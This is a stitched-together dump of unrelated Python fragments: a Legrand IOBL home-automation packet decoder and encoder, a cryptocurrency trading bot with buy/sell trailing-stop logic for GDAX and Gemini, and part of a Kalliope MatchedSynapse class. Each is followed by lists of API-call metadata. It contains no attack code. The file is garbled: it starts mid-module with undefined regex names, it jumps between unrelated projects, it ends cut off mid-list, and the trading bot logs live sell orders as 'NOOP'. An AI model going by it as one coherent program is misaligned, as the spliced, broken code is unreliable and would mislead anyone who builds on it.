WHERE_DEFINITION = r'(\d+)?#*(\d+)?#*(\d*)$'
WHAT_DEFINITION = r'(\d+)#?(\d*)#?(\d*)#?'
DIMENSION_DEFINITION = r'([\d#]+)\*?(\d*)(.*)'
VAL_DEFINITION = r'\*?(\d+)(.*)'
bus_command_re = re.compile(BUS_COMMAND)
ack_nack_re = re.compile(ACK_NACK_RE)
special_request_re = re.compile(SPECIAL_REQUEST)
status_request_re = re.compile(STATUS_REQUEST)
dimension_req_re = re.compile(DIMENSION_REQUEST)
dimension_set_re = re.compile(DIMENSION_SET)
where_decode_re = re.compile(WHERE_DEFINITION)
what_decode_re = re.compile(WHAT_DEFINITION)
dimension_decode_re = re.compile(DIMENSION_DEFINITION)
val_decode_re = re.compile(VAL_DEFINITION)
# Open packet field definitions.
# Device type ("who") identification.
devicetype = {
    '1': 'light',
    '2': 'automation',
    '4': 'thermoregulation',
    '8': 'doorentry',
    '25': 'scenario',
    '13': 'management',
    '14': 'special',
    '1000': 'configuration',
}
# Light command identification.
light_command = {
    '1': 'on',
    '0': 'off',
    '38': 'dim_stop',
}
# Light dimension set identification.
light_dimension = {
    '10': 'dim_step',
    '1': 'go_to_level_time',
}
# Shutter command identification.
automation_command = {
    '0': 'move_stop',
    '1': 'move_up',
    '2': 'move_down',
}
# Thermoregulation command identification.
thermoregulation_command = {
    '50': 'setpoint',
    '51': 'override_setpoint',
    '52': 'end_override',
    '53': 'go_to_temperature',
    '54': 'stop',
    '55': 'end_stop',
    '56': 'stop_fan_speed',
    '57': 'low_fan_speed',
    '58': 'high_fan_speed',
    '59': 'confort_jour_rouge',
}
# Scenario command identification.
scenario_command = {
    '11': 'action',
    '16': 'stop_action',
    '17': 'action_for_time',
    '18': 'action_in_time',
    '19': 'info_scene_off',
}
# Door entry command identification.
door_entry_command = {
    '1': 'concierge_call',
    '19': 'locker_control',
}
# Configuration command identification.
configuration_command = {
    '61': 'open_learning',
    '62': 'close_learning',
    '63': 'address_erase',
    '64': 'memory_reset',
    '65': 'memory_full',
    '66': 'memory_read',
    '72': 'valid_action',
    '73': 'invalid_action',
    '68': 'cancel_id',
    '69': 'management_clock_synchronisation',
    '70': 'occupied',
    '71': 'unoccupied',
}
# Configuration dimension identification.
configuration_dimension = {
    '13': 'announce_id',
    '51': 'device_description_request',
    '55': 'unit_description_request',
}
# Communication mode ("where" prefix) identification.
communication_mode = {
    '0': 'broadcast',
    '1': 'multicast',
    '2': 'unicast_direct',
    '3': 'unicast',
    '': 'unicast',
}
# Communication media ("where" suffix) identification.
communication_media = {
    '0': 'plc',
    '1': 'rf',
    '2': 'ir',
    '': 'plc',
}
def valid_packet(packet: str) -> bool:
"""Verify if packet is valid."""
return (bool(bus_command_re.match(packet)) |
bool(ack_nack_re.match(packet)) |
bool(status_request_re.match(packet)) |
bool(dimension_req_re.match(packet)) |
bool(dimension_set_re.match(packet)))
def decode_packet(packet: str) -> dict:
"""Break packet down into primitives, and do basic interpretation."""
if bool(bus_command_re.match(packet)):
who, what, where = bus_command_re.match(packet).group(1, 2, 3)
data = cast(Dict[str, Any], {
'who': devicetype.get(who),
})
device_type_name = {v: k for k, v in devicetype.items()}
command = what_decode_re.match(what).group(1)
if who == device_type_name.get('light'):
data['what'] = light_command.get(what)
elif who == device_type_name.get('automation'):
data['what'] = automation_command.get(what)
elif who == device_type_name.get('scenario'):
data['what'] = scenario_command.get(command)
elif who == device_type_name.get('configuration'):
data['what'] = configuration_command.get(command)
elif who == device_type_name.get('doorentry'):
data['what'] = door_entry_command.get(what)
elif who == device_type_name.get('thermoregulation'):
data['what'] = thermoregulation_command.get(command)
data['legrand_id'], data['unit'], data['mode'], data['media'] = parse_legrand_id(str(where))
data['type'] = 'bus_command'
data['command'] = ''
elif bool(ack_nack_re.match(packet)):
if ack_nack_re.match(packet).group(1) == '0':
data = cast(Dict[str, Any], {
'type': 'nack',
'legrand_id': '',
})
else:
data = cast(Dict[str, Any], {
'type': 'ack',
'legrand_id': '',
})
elif bool(status_request_re.match(packet)):
who, where = status_request_re.match(packet).group(1, 2)
data = cast(Dict[str, Any], {
'type': 'status_request',
'who': devicetype.get(who),
})
data['legrand_id'], data['unit'], data['mode'], data['media'] = parse_legrand_id(str(where))
elif bool(dimension_req_re.match(packet)):
who, where, dimension = dimension_req_re.match(packet).group(1, 2, 3)
data = cast(Dict[str, Any], {
'type': 'dimension_request',
'who': devicetype.get(who),
})
data['legrand_id'], data['unit'], data['mode'], data['media'] = parse_legrand_id(str(where))
data['dimension'], data['val'] = parse_dimension(dimension)
elif bool(dimension_set_re.match(packet)):
who, where = dimension_set_re.match(packet).group(1, 2)
data = cast(Dict[str, Any], {
'type': 'dimension_set',
'who': devicetype.get(who),
})
data['legrand_id'], data['unit'], data['mode'], data['media'] = parse_legrand_id(str(where))
return data
def parse_legrand_id(where: str):
"""Extract legrand id from where token."""
result = where_decode_re.match(where)
match1, match2, match3 = result.group(1, 2, 3)
if match1 is not None and len(match1) > 1:
legrandid, unit = get_id_unit(match1)
media = communication_media.get(match2)
mode = communication_mode.get('')
elif match2 is not None and len(match2) > 1:
legrandid, unit = get_id_unit(match2)
media = communication_media.get(match3)
if match1 is not None:
mode = communication_mode.get(match1)
else:
mode = communication_mode.get('')
return (legrandid, unit, mode, media)
def parse_dimension(dimension: str):
"""Extract dimension and vals from dimension token."""
decoded_dim, newval, new_dimension = dimension_decode_re.match(dimension).group(1, 2, 3)
val = list()
if newval:
val.append(newval)
while new_dimension:
newval, new_dimension = val_decode_re.match(new_dimension).group(1, 2)
if newval:
val.append(newval)
return decoded_dim, val
def get_id_unit(idstr: str):
"""Extract the ID part in the ID string."""
tmpid = hex(int(idstr))
if len(tmpid) == 7:
unitsize = 2
else:
unitsize = 1
unit = tmpid[-unitsize:]
legrand_id = str(int(tmpid[0:-unitsize], 0))
return (legrand_id, unit)
def encode_packet(packet_fields: dict) -> str:
"""Call the encoding method according packet type."""
if packet_fields.get('type') == 'bus_command':
return encode_bus_command(packet_fields)
elif packet_fields.get('type') == 'set_dimension':
return encode_set_dimension(packet_fields)
else:
return ''
def encode_bus_command(packet_fields: dict) -> str:
"""Encode the input fields into an IOBL bus_command packet."""
where = encode_where(packet_fields.get('legrand_id'), packet_fields.get('unit'),
packet_fields.get('mode'), packet_fields.get('media'))
device_type_name = {v: k for k, v in devicetype.items()}
if packet_fields.get('who') == 'light':
light_command_name = {v: k for k, v in light_command.items()}
encoded_packet = '*' + device_type_name.get(packet_fields.get('who')) + '*' + light_command_name.get(packet_fields.get('what')) + '*' + where + '##'
elif packet_fields.get('who') == 'automation':
automation_command_name = {v: k for k, v in automation_command.items()}
encoded_packet = '*' + device_type_name.get(packet_fields.get('who')) + '*' + automation_command_name.get(packet_fields.get('what')) + '*' + where + '##'
elif packet_fields.get('who') == 'thermoregulation':
thermoregulation_command_name = {v: k for k, v in thermoregulation_command.items()}
encoded_packet = '*' + device_type_name.get(packet_fields.get('who')) + '*' + thermoregulation_command_name.get(packet_fields.get('what')) + '*' + where + '##'
elif packet_fields.get('who') == 'doorentry':
door_entry_command_name = {v: k for k, v in door_entry_command.items()}
encoded_packet = '*' + device_type_name.get(packet_fields.get('who')) + '*' + door_entry_command_name.get(packet_fields.get('what')) + '*' + where + '##'
elif packet_fields.get('who') == 'scenario':
scenario_command_name = {v: k for k, v in scenario_command.items()}
encoded_packet = '*' + device_type_name.get(packet_fields.get('who')) + '*' + scenario_command_name.get(packet_fields.get('what')) + '*' + where + '##'
elif packet_fields.get('who') == 'configuration':
configuration_command_name = {v: k for k, v in configuration_command.items()}
encoded_packet = '*' + device_type_name.get(packet_fields.get('who')) + '*' + configuration_command_name.get(packet_fields.get('what')) + '*' + where + '##'
return encoded_packet
def encode_set_dimension(packet_fields: dict) -> str:
"""Encode the input fields into an IOBL set_dimension/dimension_request packet."""
where = encode_where(packet_fields.get('legrand_id'), packet_fields.get('unit'),
packet_fields.get('mode'), packet_fields.get('media'))
pkt_values = ''
for value in packet_fields.get('values'):
pkt_values = pkt_values + '*' + value
device_type_name = {v: k for k, v in devicetype.items()}
if packet_fields.get('who') == 'light':
light_dimension_name = {v: k for k, v in light_dimension.items()}
encoded_packet = '*#' + device_type_name.get(packet_fields.get('who')) + '*' + where + '*' + light_dimension_name.get(packet_fields.get('dimension')) + pkt_values + '##'
elif packet_fields.get('who') == 'configuration':
configuration_dimension_name = {v: k for k, v in configuration_dimension.items()}
encoded_packet = '*#' + device_type_name.get(packet_fields.get('who')) + '*' + where + '*' + configuration_dimension_name.get(packet_fields.get('dimension')) + pkt_values + '##'
return encoded_packet
def encode_where(legrandid: str, unit: str, com_mode: str, com_media: str) -> str:
"""Encode the where clause of IOBL packet."""
where = encode_id_unit(legrandid, unit)
communication_media_name = {v: k for k, v in communication_media.items()}
communication_mode_name = {v: k for k, v in communication_mode.items()}
if com_mode == 'unicast' or com_mode == 'multicast':
if com_media == 'plc':
where = str(where)
else:
where = str(where) + '#' + communication_media_name.get(com_media)
elif com_mode == 'broadcast':
# When in broadcast mode, the legrand_id provided shall be the source address
if com_media == 'plc':
where = communication_mode_name.get('broadcast') + '#' + str(where)
else:
where = communication_mode_name.get('broadcast') + '#' + str(where) + '#' + communication_media_name.get(com_media)
else:
where = '#' + str(where)
return where
def encode_id_unit(legrandid: str, unit: str) -> int:
"""Encode the input legrand_id and unit."""
legrandid = hex(int(legrandid))
return int(legrandid + unit, 0)
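# Worked example (a sketch; the packet below is illustrative, not a real
# capture): decode_packet('*1*1*123456#2##') yields roughly
# {'who': 'light', 'what': 'on', 'type': 'bus_command', 'legrand_id': '482',
#  'unit': '40', 'mode': 'unicast', 'media': 'ir', 'command': ''}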
|
[
"typing.cast",
"re.compile"
] |
[((830, 853), 're.compile', 're.compile', (['BUS_COMMAND'], {}), '(BUS_COMMAND)\n', (840, 853), False, 'import re\n'), ((868, 891), 're.compile', 're.compile', (['ACK_NACK_RE'], {}), '(ACK_NACK_RE)\n', (878, 891), False, 'import re\n'), ((913, 940), 're.compile', 're.compile', (['SPECIAL_REQUEST'], {}), '(SPECIAL_REQUEST)\n', (923, 940), False, 'import re\n'), ((961, 987), 're.compile', 're.compile', (['STATUS_REQUEST'], {}), '(STATUS_REQUEST)\n', (971, 987), False, 'import re\n'), ((1007, 1036), 're.compile', 're.compile', (['DIMENSION_REQUEST'], {}), '(DIMENSION_REQUEST)\n', (1017, 1036), False, 'import re\n'), ((1056, 1081), 're.compile', 're.compile', (['DIMENSION_SET'], {}), '(DIMENSION_SET)\n', (1066, 1081), False, 'import re\n'), ((1101, 1129), 're.compile', 're.compile', (['WHERE_DEFINITION'], {}), '(WHERE_DEFINITION)\n', (1111, 1129), False, 'import re\n'), ((1147, 1174), 're.compile', 're.compile', (['WHAT_DEFINITION'], {}), '(WHAT_DEFINITION)\n', (1157, 1174), False, 'import re\n'), ((1197, 1229), 're.compile', 're.compile', (['DIMENSION_DEFINITION'], {}), '(DIMENSION_DEFINITION)\n', (1207, 1229), False, 'import re\n'), ((1246, 1272), 're.compile', 're.compile', (['VAL_DEFINITION'], {}), '(VAL_DEFINITION)\n', (1256, 1272), False, 'import re\n'), ((5202, 5258), 'typing.cast', 'cast', (['Dict[str, Any]', "{'type': 'nack', 'legrand_id': ''}"], {}), "(Dict[str, Any], {'type': 'nack', 'legrand_id': ''})\n", (5206, 5258), False, 'from typing import Any, Dict, cast\n'), ((5339, 5394), 'typing.cast', 'cast', (['Dict[str, Any]', "{'type': 'ack', 'legrand_id': ''}"], {}), "(Dict[str, Any], {'type': 'ack', 'legrand_id': ''})\n", (5343, 5394), False, 'from typing import Any, Dict, cast\n')]
|
import tradebotapiclient
import tradebotgdaxclient
import tickerdb
import math
import time
import datetime
import traceback
import random
import yaml
import sys
import os.path
import tradeerrors
import os
class Tradebot(object):
def issuebuyorder(self,current):
cryptotobuy = self.base_unit / current
self.buyrate = current
id = None
i = len(self.sym)-3
j = len(self.sym)
if self.dryrun:
self.tprint("NOOP: Issuing buy order for %f %s at %f %s" % (cryptotobuy,self.sym[0:3],self.buyrate,self.sym[i:j]))
id = 0
else:
self.tprint("Issuing buy order for %f %s at %f %s" % (cryptotobuy,self.sym[0:3],self.buyrate,self.sym[i:j]))
id, status, executed_amount = self.tradebotapiclient.buy(cryptotobuy,current,4,10)
if id is not None:
self.tprint("Buy order %f has status: %s" % (id,status))
if status == "full" or status == "partial": #Buy was successful
self.crypto_bought = executed_amount
self.tprint("Bought crypto amount %f " % self.crypto_bought)
else: #in case of a failure perform random backoff
self.errorwithrandombackoff(self.interval,300)
id = None
return id
def issuesellorder(self,current):
cryptotosell = self.base_unit / current
self.sellrate = current
id = None
i = len(self.sym)-3
j = len(self.sym)
if self.dryrun:
self.tprint("NOOP: Issuing sell order for %f %s at %f %s" % (cryptotosell,self.sym[0:3],self.sellrate,self.sym[i:j]))
id = 0
else:
self.tprint("NOOP: Issuing sell order for %f %s at %f %s" % (cryptotosell,self.sym[0:3],self.sellrate,self.sym[i:j]))
id, status, executed_amount = self.tradebotapiclient.sell(cryptotosell,current,4,10)
if id is not None:
self.tprint("Sell order %f has status: %s" % (id,status))
if status == "full" or status == "partial": #Sell was successful
self.crypto_sold = executed_amount
self.tprint("Sold crypto amount %f " % self.crypto_sold)
if self.crypto_bought is not None:
crypto_new = self.crypto_bought - self.crypto_sold
self.tprint("Crypto added since previous buy: %f " % crypto_new)
self.crypto_added = self.crypto_added + crypto_new
self.tprint("Total crypto added: %f " % self.crypto_added)
else: #in case of a failure perform random backoff
self.errorwithrandombackoff(self.interval,300)
id = None
return id
#State changes for auto mode. Override for other modes
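    #States (indices match self.state_names set in __init__):
    #  0 = prebuy, 1 = trailing_buy, 2 = presell, 3 = trailing_sell; -1 is the stop flag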
def nextstate(self):
if self.state == 0: #prebuy
if self.botparmsdict['trailing_buy_percent'] > 0:
self.state = 1 #buy or auto mode
else:
if self.mode == "auto": #mode is auto and trailing_percent == 0
self.state = 2
else: #mode is buy and trailing_percent == 0
self.iterations = self.iterations + 1
        elif self.state == 1: #trailingbuy
if self.mode == "buy":
self.iterations = self.iterations + 1
self.state = 0
else: #mode is auto
self.state = 2
        elif self.state == 2: #presell
if self.botparmsdict['trailing_sell_percent'] > 0:
self.state = 3 #sell or auto mode
else:
self.iterations = self.iterations + 1
if self.mode == "auto":
self.state = 0 #mode is auto and trailing_percent == 0
else:
pass #mode is sell and trailing_percent == 0
elif self.state == 3: #trailingsell
self.iterations = self.iterations + 1
if self.mode == "sell":
self.state = 2 #Go back to pre-sell
else: #Mode is auto - go back to beginning
self.state = 0
if self.iterations >= self.iterations_to_live:
self.state = -1
self.tprint("Tradebot stopping, reached iterations to live")
self.interval = 0.5
return
else:
self.interval = self.intervals[self.state_names[self.state]]
def run(self):
self.errorcount = 0
self.fatalerrors = 0
self.maxfatalerrors = 3
        self.maxconterrors = 15 #If there are 15 continuous errors then we should quit
self.conterrors = 0
self.crypto_added = 0
self.tprint("Tradebot starting, output key: [State: %s| Iteration: %d]" % (self.state_names[self.state],self.iterations))
while True:
try:
if self.state == -1: #Stopping if this flag is set
break
if os.path.isfile(self.stopfilename) or os.path.isfile(self.globalstopfilename): #stop if this file is found
self.tprint("Stopping due to presence of stopfile: %s, or global stopfile: %s" % (self.stopfilename, self.globalstopfilename))
break
current = self.tickerdb.last(self.sym)
if self.state == 0: #prebuy state
base_value = self.base_value_method(self.sym)
delta = self.getabsbasedelta(current,base_value,"current",self.botparmsdict['base_value'])
if current < base_value and delta >= self.botparmsdict['buy_delta_percent']:
if self.botparmsdict['trailing_buy_percent'] == 0: #issue immediate buy
if self.issuebuyorder(current) is not None:
self.nextstate()
else: #trigger trailing stop buy state
self.trailing_buy_low = current
self.trailing_buy_high = current * (100 + self.botparmsdict['trailing_buy_percent'])/100
self.nextstate()
elif self.state == 1: #trailing stop buy state
base_value = self.base_value_method(self.sym)
delta = self.getabsbasedelta(current,base_value,"current",self.botparmsdict['base_value'])
if current < self.trailing_buy_low:
self.trailing_buy_low = current
self.trailing_buy_high = current * (100 + self.botparmsdict['trailing_buy_percent'])/100
elif current > self.trailing_buy_high and current < base_value:
if self.issuebuyorder(current) is not None:
self.nextstate()
elif self.state == 2: #presell
delta = self.getabsbasedelta(current,self.buyrate,"current","buy rate")
if current > self.buyrate and delta >= self.botparmsdict['sell_delta_percent']:
if self.botparmsdict['trailing_sell_percent'] == 0: #issue immediate sell
if self.issuesellorder(current) is not None:
self.nextstate()
else: #trigger trailing stop sell
self.trailing_sell_high = current
self.trailing_sell_low = current * (100 - self.botparmsdict['trailing_sell_percent'])/100
self.nextstate()
elif self.state == 3: #trailing stop sell state
delta = self.getabsbasedelta(current,self.buyrate,"current","buy rate")
if current > self.trailing_sell_high:
self.trailing_sell_high = current
self.trailing_sell_low = current * (100 - self.botparmsdict['trailing_sell_percent'])/100
elif current < self.trailing_sell_low and current > self.buyrate:
if self.issuesellorder(current) is not None:
self.nextstate()
if self.conterrors > 0: #Reset continuous errors to zero
self.conterrors = 0
time.sleep(self.interval)
except tradeerrors.InsufficientFundsError as ife: #Exit immediately
self.tprint(str(ife))
traceback.print_exc()
break
except tradeerrors.OrderPlacementError as ope: #Try backing off with 3 retries max
self.tprint(str(ope))
traceback.print_exc()
if self.fatalerrors < self.maxfatalerrors:
self.fatalerrors = self.fatalerrors + 1
self.errorwithrandombackoff(self.interval+300,300)
else:
self.tprint("Exiting due to reaching maximum # of fatal errors: %d" % self.maxfatalerrors)
break
except tradeerrors.UnknownResponseError as ure: #Try backing off with 3 retries max
self.tprint(str(ure))
traceback.print_exc()
if self.fatalerrors < self.maxfatalerrors:
self.fatalerrors = self.fatalerrors + 1
self.errorwithrandombackoff(self.interval+300,300)
else:
self.tprint("Exiting due to reaching maximum # of fatal errors: %d" % self.maxfatalerrors)
break
except Exception as e: #General errors: log and keep going
self.tprint(str(e))
traceback.print_exc()
if self.conterrors < self.maxconterrors:
self.conterrors = self.conterrors + 1
self.errorwithrandombackoff(self.conterrors*self.interval,100)
else:
self.tprint("Exiting due to reaching maximum # of continuous errors: %d" % self.maxconterrors)
break
self.tradebotapiclient.gracefulstop()
def errorwithrandombackoff(self,minimum,randomrange):
self.errorcount = self.errorcount + 1
backofftime = minimum + random.randint(0,randomrange)
self.tprint("ERROR: Error count %d, pausing for %d seconds" % (self.errorcount,backofftime) )
time.sleep(backofftime)
def getabsbasedelta(self,val,base,val_desc,base_desc):
cmp = "+"
if val < base:
cmp = "-"
delta = ((math.fabs(val-base) / base)*100)
roc = delta - self.prevdelta
self.prevdelta = delta
self.tprint("%s [%f], %s [%f], delta: %s%f%% (roc: %f)" % (val_desc,val,base_desc,base,cmp,delta,roc))
return delta
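    #Worked example (hypothetical numbers): val=105, base=100 ->
    #delta = (|105 - 100| / 100) * 100 = 5.0 percent, with cmp '+'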
#prints a message with state and timestamp
def tprint(self,msg):
now = datetime.datetime.now()
t = now.strftime("%y-%m-%d %H:%M:%S")
print("[%s][%s|%d] %s" % (str(t),self.state_names[self.state],self.iterations,msg))
def get_base_value(self,sym):
return self.base_value
def __init__(self, bot_name, cfg, redirect_output):
self.bot_name = bot_name
self.state_names = ['prebuy','trailing_buy','presell','trailing_sell']
#Redirecting output
if redirect_output:
logs_dir = "logs"
out_path = logs_dir + "/" + bot_name + ".out.txt"
err_path = logs_dir + "/" + bot_name + ".err.txt"
if os.path.exists(logs_dir) and not os.path.exists(out_path) and not os.path.exists(err_path):
print("NOTE: Redirecting stderr to %s, and stdout to: %s" % (err_path,out_path)) #Not using tprint as state has not been established
sys.stdout = open(out_path, 'w')
sys.stderr = open(err_path, 'w')
#Set streams to unbuffered
sys.stdout = Unbuffered(sys.stdout)
sys.stderr = Unbuffered(sys.stderr)
else: #Not using tprint as state has not been established
msg = "ERROR: Logs directory: %s does not exist, or log files: %s %s exist" % (logs_dir,out_path,err_path)
print(msg)
e = tradeerrors.BotIniterror(msg)
raise(e)
#Enable safemode by default or in case of missing api credentials
if 'safemode' not in cfg or 'api_key' not in cfg or 'api_secret' not in cfg:
cfg['safemode'] = True
elif cfg['safemode'] == True and cfg['exchange'] == "gdax" and 'passphrase' not in cfg:
cfg['safemode'] = True
else:
pass
#In case of safemode clear out credentials from memory
if cfg['safemode']:
cfg['passphrase'] = None
cfg['api_key'] = None
cfg['api_secret'] = None
#Handle required parameters
self.botparmsdict = {
'sym': cfg['sym'],
'exchange': cfg['exchange'],
'dryrun': bool(cfg['safemode']),
'base_unit': float(cfg['base_unit']),
'mode': cfg['mode'],
'base_value': cfg['base_value'],
'trailing_buy_percent': cfg['trailing_percent'],
'trailing_sell_percent': cfg['trailing_percent'],
}
#Populate required parameters
self.sym = self.botparmsdict['sym']
self.base_unit = self.botparmsdict['base_unit']
self.dryrun = self.botparmsdict['dryrun']
self.mode = self.botparmsdict['mode']
if self.mode == "auto" or self.mode == "sell":
self.botparmsdict['sell_delta_percent'] = float(cfg['sell_delta_percent'])
if self.mode == "auto" or self.mode == "buy":
self.botparmsdict['buy_delta_percent'] = float(cfg['buy_delta_percent'])
if self.mode == "sell":
self.botparmsdict['prev_purchase_val'] = float(cfg['prev_purchase_val'])
#Handle optional parameters
if 'iterations_to_live' not in cfg:
self.botparmsdict['iterations_to_live'] = 3
else:
self.botparmsdict['iterations_to_live'] = int(cfg['iterations_to_live'])
if 'default_interval' not in cfg:
self.botparmsdict['default_interval'] = 60
else:
self.botparmsdict['default_interval'] = int(cfg['default_interval'])
if 'trailing_interval' not in cfg:
self.botparmsdict['trailing_interval'] = 10
else:
self.botparmsdict['trailing_interval'] = int(cfg['trailing_interval'])
#populate optional parameters
self.interval = self.botparmsdict['default_interval']
self.iterations_to_live = self.botparmsdict['iterations_to_live']
#Instantiate API Client
exchange = cfg['exchange']
if exchange == 'gdax':
self.tradebotapiclient = tradebotgdaxclient.Tradebotgdaxclient(cfg)
self.tickerdb = tickerdb.Tickerdb("gdax",self.sym)
elif exchange == 'gemini':
self.tradebotapiclient = tradebotapiclient.Tradebotapiclient(cfg)
self.tickerdb = tickerdb.Tickerdb("gemini",self.sym)
else:
e = tradeerrors.InputError(exchange,"exchange")
raise(e)
#handle base_value parameter:
base_value = cfg['base_value']
if base_value == "daily_avg":
self.base_value_method = self.tickerdb.getDailyAverage
elif base_value == "weekly_avg":
self.base_value_method = self.tickerdb.getWeeklyAverage
elif base_value == "hourly_avg":
self.base_value_method = self.tickerdb.getHourlyAverage
elif base_value == "monthly_avg":
self.base_value_method = self.tickerdb.getMonthlyAverage
else: #A static value was set
self.base_value = float(base_value)
if self.mode == "buy":
self.base_value_method = self.get_base_value
else:
self.tprint("ERROR: A static base_value is only allowed with buy modes")
e = tradeerrors.InputError(str(self.base_value),"base_value")
raise(e)
#set initial state
self.iterations = 0
self.stopfilename = self.bot_name+".stop"
self.globalstopfilename = "bot.stop"
self.prevdelta = 0
if self.mode == "auto" or self.mode == "buy":
self.state = 0
elif self.mode == "sell":
self.buyrate = self.botparmsdict['prev_purchase_val']
self.state = 2
self.crypto_bought = self.base_unit / self.buyrate
else:
e = tradeerrors.InputError(self.mode,"mode")
raise(e)
self.tprint("INFO: Successfully Initialized Tradebot instance with bot_name %s and parameter set %s " % (self.bot_name,self.botparmsdict))
self.tprint("INFO: To stop, create an empty file called in current directory: %s" % self.stopfilename)
if self.dryrun:
self.tprint("INFO: SAFEMODE (DRYRUN) IS ON. No buy or sell orders will be issued.")
else:
self.tprint("WARNING: SAFEMODE (DRYRUN) IS OFF, WILL ISSUE BUY / SELL ORDERS, CONSIDER RISK OF LOSS!")
self.intervals = {
'prebuy': self.botparmsdict['default_interval'],
'trailing_buy': self.botparmsdict['trailing_interval'],
'presell': self.botparmsdict['default_interval'],
'trailing_sell': self.botparmsdict['trailing_interval']
}
#A class to flush output on every print
#https://stackoverflow.com/questions/107705/disable-output-buffering
class Unbuffered(object):
def __init__(self, stream):
self.stream = stream
def write(self, data):
self.stream.write(data)
self.stream.flush()
def writelines(self, datas):
self.stream.writelines(datas)
self.stream.flush()
def __getattr__(self, attr):
return getattr(self.stream, attr)
#Main method to run without a tradebot manager
def main(bot_name):
config_file_name = "config.yml"
try:
with open(config_file_name, 'r') as ymlfile:
            cfg = yaml.load(ymlfile, Loader=yaml.SafeLoader)  # explicit Loader; the with-block closes the file
bot = Tradebot(bot_name,cfg[bot_name],False)
bot.run()
except Exception as e:
print(str(e))
traceback.print_exc()
if __name__ == "__main__":
if len(sys.argv) < 2:
print("ERROR: must provide a bot name from config.yml")
else:
main(sys.argv[1])
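# Usage: python <this_file> <bot_name>, where <bot_name> is a key in config.yml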
|
[
"yaml.load",
"traceback.print_exc",
"tradebotapiclient.Tradebotapiclient",
"random.randint",
"math.fabs",
"os.path.exists",
"time.sleep",
"tradeerrors.BotIniterror",
"os.path.isfile",
"tradebotgdaxclient.Tradebotgdaxclient",
"tickerdb.Tickerdb",
"tradeerrors.InputError",
"datetime.datetime.now"
] |
[((10600, 10623), 'time.sleep', 'time.sleep', (['backofftime'], {}), '(backofftime)\n', (10610, 10623), False, 'import time\n'), ((11088, 11111), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (11109, 11111), False, 'import datetime\n'), ((10460, 10490), 'random.randint', 'random.randint', (['(0)', 'randomrange'], {}), '(0, randomrange)\n', (10474, 10490), False, 'import random\n'), ((15110, 15152), 'tradebotgdaxclient.Tradebotgdaxclient', 'tradebotgdaxclient.Tradebotgdaxclient', (['cfg'], {}), '(cfg)\n', (15147, 15152), False, 'import tradebotgdaxclient\n'), ((15182, 15217), 'tickerdb.Tickerdb', 'tickerdb.Tickerdb', (['"""gdax"""', 'self.sym'], {}), "('gdax', self.sym)\n", (15199, 15217), False, 'import tickerdb\n'), ((18396, 18414), 'yaml.load', 'yaml.load', (['ymlfile'], {}), '(ymlfile)\n', (18405, 18414), False, 'import yaml\n'), ((18581, 18602), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (18600, 18602), False, 'import traceback\n'), ((8458, 8483), 'time.sleep', 'time.sleep', (['self.interval'], {}), '(self.interval)\n', (8468, 8483), False, 'import time\n'), ((10766, 10787), 'math.fabs', 'math.fabs', (['(val - base)'], {}), '(val - base)\n', (10775, 10787), False, 'import math\n'), ((11721, 11745), 'os.path.exists', 'os.path.exists', (['logs_dir'], {}), '(logs_dir)\n', (11735, 11745), False, 'import os\n'), ((12447, 12476), 'tradeerrors.BotIniterror', 'tradeerrors.BotIniterror', (['msg'], {}), '(msg)\n', (12471, 12476), False, 'import tradeerrors\n'), ((15289, 15329), 'tradebotapiclient.Tradebotapiclient', 'tradebotapiclient.Tradebotapiclient', (['cfg'], {}), '(cfg)\n', (15324, 15329), False, 'import tradebotapiclient\n'), ((15359, 15396), 'tickerdb.Tickerdb', 'tickerdb.Tickerdb', (['"""gemini"""', 'self.sym'], {}), "('gemini', self.sym)\n", (15376, 15396), False, 'import tickerdb\n'), ((15426, 15470), 'tradeerrors.InputError', 'tradeerrors.InputError', (['exchange', '"""exchange"""'], {}), "(exchange, 'exchange')\n", (15448, 15470), False, 'import tradeerrors\n'), ((16892, 16933), 'tradeerrors.InputError', 'tradeerrors.InputError', (['self.mode', '"""mode"""'], {}), "(self.mode, 'mode')\n", (16914, 16933), False, 'import tradeerrors\n'), ((5080, 5113), 'os.path.isfile', 'os.path.isfile', (['self.stopfilename'], {}), '(self.stopfilename)\n', (5094, 5113), False, 'import os\n'), ((5117, 5156), 'os.path.isfile', 'os.path.isfile', (['self.globalstopfilename'], {}), '(self.globalstopfilename)\n', (5131, 5156), False, 'import os\n'), ((8631, 8652), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (8650, 8652), False, 'import traceback\n'), ((8841, 8862), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (8860, 8862), False, 'import traceback\n'), ((9380, 9401), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (9399, 9401), False, 'import traceback\n'), ((9876, 9897), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (9895, 9897), False, 'import traceback\n'), ((11754, 11778), 'os.path.exists', 'os.path.exists', (['out_path'], {}), '(out_path)\n', (11768, 11778), False, 'import os\n'), ((11787, 11811), 'os.path.exists', 'os.path.exists', (['err_path'], {}), '(err_path)\n', (11801, 11811), False, 'import os\n')]
|
import copy
from kalliope.core.NeuronParameterLoader import NeuronParameterLoader
class MatchedSynapse(object):
"""
    This class represents a synapse that has matched an order sent by a user.
"""
def __init__(self, matched_synapse=None, matched_order=None, user_order=None):
"""
:param matched_synapse: The synapse that has matched in the brain.
        :param matched_order: The order from the synapse that has matched.
:param user_order: The order said by the user.
"""
        # create a copy of the synapse. The received synapse comes from the brain.
self.synapse = matched_synapse
# create a fifo list that contains all neurons to process.
        # Create a copy so that removing a neuron from this list does not
        # remove it from the synapse's neuron list
self.neuron_fifo_list = copy.deepcopy(self.synapse.neurons)
self.matched_order = matched_order
self.parameters = dict()
if matched_order is not None:
self.parameters = NeuronParameterLoader.get_parameters(synapse_order=self.matched_order,
user_order=user_order)
# list of Neuron Module
self.neuron_module_list = list()
def __str__(self):
return str(self.serialize())
def serialize(self):
"""
        This method serializes this object in a proper way
:return: A dict of name and parameters
:rtype: Dict
"""
return {
'synapse_name': self.synapse.name,
'matched_order': self.matched_order,
'neuron_module_list': [e.serialize() for e in self.neuron_module_list]
}
def __eq__(self, other):
"""
This is used to compare 2 objects
:param other:
:return:
"""
return self.__dict__ == other.__dict__
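# Minimal usage sketch (hypothetical objects, not from this module):
#   matched = MatchedSynapse(matched_synapse=a_brain_synapse,
#                            matched_order="the synapse signal",
#                            user_order="what the user said")
#   print(matched.serialize())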
|
[
"kalliope.core.NeuronParameterLoader.NeuronParameterLoader.get_parameters",
